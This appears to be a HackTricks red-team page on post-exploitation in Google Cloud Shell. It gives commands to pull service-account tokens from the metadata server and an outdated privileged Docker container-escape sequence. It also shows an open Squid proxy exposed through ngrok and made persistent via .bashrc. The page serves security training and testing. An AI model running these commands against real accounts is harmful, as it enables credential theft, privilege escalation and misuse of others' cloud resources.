GCP - Cloud Shell Post Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Shell

For more information about Cloud Shell check:

GCP - Cloud Shell Enum

Obtains users token from metadata

Just accessing the metadata server you can obtain a token to access as the currently logged on user:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"

Container Escape / Docker use

Warning

Previously the cloud shell run in a container with access to the docker socket of the host. Now Google has changed the architecture and the cloud shell container runs a “Docker in a container” setup. So even if it’s possible to use docker from the cloud shell, you won’t be able to escape to the host using the docker socket. Note that previously the docker.sock file was located in /google/host/var/run/docker.sock but now it has been moved to /run/docker.sock.

Docker use / Old container escape commands 
sudo docker -H unix:///run/docker.sock pull alpine:latest
sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///run/docker.sock start escaper
sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh

Moreover, in the past it was possible to find a token for a service account used by the cloud shell VM in the metadata server:

Old service account from metadata 
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

With the following scopes:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Use it as Proxy

If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):

Install Squid proxy 
sudo apt install -y squid

Just for let you know Squid is a http proxy server. Create a squid.conf file with the following settings:

Create squid.conf file 
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

copy the squid.conf file to /etc/squid

Copy config to /etc/squid 
sudo cp squid.conf /etc/squid

Finally run the squid service:

Start Squid service 
sudo service squid start

Use ngrok to let the proxy be available from outside:

Expose proxy with ngrok 
./ngrok tcp 3128

After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).

For better use at startup the .bashrc file should have the following lines:

Add to .bashrc for automatic startup 
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks